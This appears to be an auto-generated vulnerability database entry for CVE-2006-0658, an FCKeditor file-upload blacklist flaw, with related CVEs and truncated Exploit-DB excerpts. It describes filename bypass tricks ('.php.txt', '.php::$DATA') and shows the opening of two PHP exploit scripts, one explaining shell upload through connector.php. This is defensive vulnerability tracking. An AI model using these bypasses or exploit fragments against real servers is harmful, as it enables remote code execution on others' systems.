CVE-2006-0658
Published: 2006-02-13
Priority: P3 · 38 · medium · 5 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:N/I:P/A:N
EXPLOIT
EPSS: 6.74% (93.1th percentile)
Incomplete blacklist vulnerability in connector.php in FCKeditor 2.0 and 2.2, as used in products such as RunCMS, allows remote attackers to upload and execute arbitrary script files by giving the files specific extensions that are not listed in the Config[DeniedExtensions][File], such as .php.txt.
Affected
7 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cardinal_cms_project | cardinal_cms | — | — |
| fckeditor | fckeditor | — | — |
| fckeditor | fckeditor | — | — |
| frederico_caldeira_knabben | fckeditor | — | — |
| redlinesoft | lanai_cms | <= 1.2.16 | — |
| sitex_cms_project | sitex_cms | — | — |
| syntax_cms_project | syntax_cms | <= 1.3 | — |
CVSS provenance
nvd · v2.0 · 5.0 MEDIUM · AV:N/AC:L/Au:N/C:N/I:P/A:N
osv · 5.0 MEDIUM
vulncheck · 5.0 MEDIUM
GHSA
GHSA-p57r-mjxp-9www: Incomplete blacklist vulnerability in editor/filemanager/upload/php/upload
ghsa_unreviewed·2022-05-01·CVSS 5.0
CVE-2007-5156 [MEDIUM] GHSA-p57r-mjxp-9www: Incomplete blacklist vulnerability in editor/filemanager/upload/php/upload
Incomplete blacklist vulnerability in editor/filemanager/upload/php/upload.php in FCKeditor, as used in SiteX CMS 0.7.3.beta, La-Nai CMS, Syntax CMS, Cardinal Cms, and probably other products, allows remote attackers to upload and execute arbitrary PHP code via a file whose name contains ".php." and has an unknown extension, which is recognized as a .php file by the Apache HTTP server, a different vulnerability than CVE-2006-0658 and CVE-2006-2529.
GHSA
GHSA-h3c2-83qf-r2j9: editor/filemanager/upload/php/upload
ghsa_unreviewed·2022-05-01·CVSS 5.0
CVE-2006-2529 [MEDIUM] GHSA-h3c2-83qf-r2j9: editor/filemanager/upload/php/upload
editor/filemanager/upload/php/upload.php in FCKeditor before 2.3 Beta, when the upload feature is enabled, does not verify the Type parameter, which allows remote attackers to upload arbitrary file types. NOTE: It is not clear whether this is related to CVE-2006-0658.
GHSA
GHSA-g6mx-39hp-44rm: Incomplete blacklist vulnerability in the filemanager in Frederico Caldeira Knabben FCKeditor 2
ghsa_unreviewed·2022-05-01·CVSS 5.0
CVE-2007-3163 [MEDIUM] GHSA-g6mx-39hp-44rm: Incomplete blacklist vulnerability in the filemanager in Frederico Caldeira Knabben FCKeditor 2
Incomplete blacklist vulnerability in the filemanager in Frederico Caldeira Knabben FCKeditor 2.4.2 allows remote attackers to upload arbitrary .php files via an alternate data stream syntax, as demonstrated by .php::$DATA filenames, a related issue to CVE-2006-0658.
GHSA
GHSA-mc7h-j7fr-g6h8: Incomplete blacklist vulnerability in connector
ghsa_unreviewed·2022-05-01
CVE-2006-0658 [MEDIUM] GHSA-mc7h-j7fr-g6h8: Incomplete blacklist vulnerability in connector
Incomplete blacklist vulnerability in connector.php in FCKeditor 2.0 and 2.2, as used in products such as RunCMS, allows remote attackers to upload and execute arbitrary script files by giving the files specific extensions that are not listed in the Config[DeniedExtensions][File], such as .php.txt.
OSV
CVE-2007-5156: Incomplete blacklist vulnerability in editor/filemanager/upload/php/upload
osv·2007-10-01·CVSS 5.0
CVE-2007-5156 [MEDIUM] CVE-2007-5156: Incomplete blacklist vulnerability in editor/filemanager/upload/php/upload
Incomplete blacklist vulnerability in editor/filemanager/upload/php/upload.php in FCKeditor, as used in SiteX CMS 0.7.3.beta, La-Nai CMS, Syntax CMS, Cardinal Cms, and probably other products, allows remote attackers to upload and execute arbitrary PHP code via a file whose name contains ".php." and has an unknown extension, which is recognized as a .php file by the Apache HTTP server, a different vulnerability than CVE-2006-0658 and CVE-2006-2529.
OSV
CVE-2007-3163: Incomplete blacklist vulnerability in the filemanager in Frederico Caldeira Knabben FCKeditor 2
osv·2007-06-11·CVSS 5.0
CVE-2007-3163 [MEDIUM] CVE-2007-3163: Incomplete blacklist vulnerability in the filemanager in Frederico Caldeira Knabben FCKeditor 2
Incomplete blacklist vulnerability in the filemanager in Frederico Caldeira Knabben FCKeditor 2.4.2 allows remote attackers to upload arbitrary .php files via an alternate data stream syntax, as demonstrated by .php::$DATA filenames, a related issue to CVE-2006-0658.
VulnCheck
FCKeditor before 2.3 Beta editor/filemanager/upload/php/upload.php Arbitrary File Upload
vulncheck·2006·CVSS 5.0
CVE-2006-2529 [MEDIUM] FCKeditor before 2.3 Beta editor/filemanager/upload/php/upload.php Arbitrary File Upload
editor/filemanager/upload/php/upload.php in FCKeditor before 2.3 Beta, when the upload feature is enabled, does not verify the Type parameter, which allows remote attackers to upload arbitrary file types. NOTE: It is not clear whether this is related to CVE-2006-0658.
Affected: fckeditor fckeditor
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.labs.greynoise.io/grimoire/2024-03-28-panning-for-gold/
No detection rules found.
Exploit-DB
InoutMailingListManager 3.1 - Remote Command Execution
exploitdb·2007-04-10
CVE-2007-2004 InoutMailingListManager 3.1 - Remote Command Execution
---
```php
#!/usr/bin/php -q -d short_open_tag=on
Thanks to rgod for the php code and Marty for the Love
";
if ($argc
*/
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

// Hex-dump helper: returns the bytes of $string as hex, followed by a
// printable rendering in which non-printable bytes are shown as "."
function quick_dump($string)
{
    $result='';$exa='';$cont=0;
    for ($i=0; $i<=strlen($string)-1; $i++)
    {
        if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
        {$result.=" .";}
        else
        {$result.=" ".$string[$i];}
        if (strlen(dechex(ord($string[$i])))==2)
        {$exa.=" ".dechex(ord($string[$i]));}
        else
        {$exa.=" 0".dechex(ord($string[$i]));}
        // wrap both renderings every 15 bytes
        $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
    }
    return $exa."\r\n".$result;
}

// Matches an ip:port pair
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

function sendpacketii($packet)
{
    global $proxy, $host, $port, $html, $proxy_regex;
    if ($proxy=='') {
        $ock=fsockopen(get
```
Exploit-DB
FCKEditor 2.0 < 2.2 - 'FileManager connector.php' Arbitrary File Upload
exploitdb·2006-02-09
CVE-2006-0658 FCKEditor 2.0 < 2.2 - 'FileManager connector.php' Arbitrary File Upload
```php
<?php
/*
FCKEditor 2.0
a short explanation: if a user can call directly
http://[target]/[path]/editor/filemanager/browser/default/connectors/php/connector.php
he can upload malicious content on a target server, including arbitrary
php code, and launch commands on it
this works when php connector is enabled in config.php and when, ex.,
in Apache httpd.conf "AddType application/x-httpd-php" directive we have
an extension not specified in FCKEditor Config[DeniedExtensions][File]
array.
However, FCKeditor is integrated in a lot of applications, and if you
succeed to upload the shell (see details in the output of this script)
search for a local inclusion issue inside of them and include the uploaded
file */
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 5);
```
No writeups or analysis indexed.
http://retrogod.altervista.org/fckeditor_22_xpl.html
http://secunia.com/advisories/18767
http://www.securityfocus.com/archive/1/424708
http://www.vupen.com/english/advisories/2006/0502
https://www.exploit-db.com/exploits/3702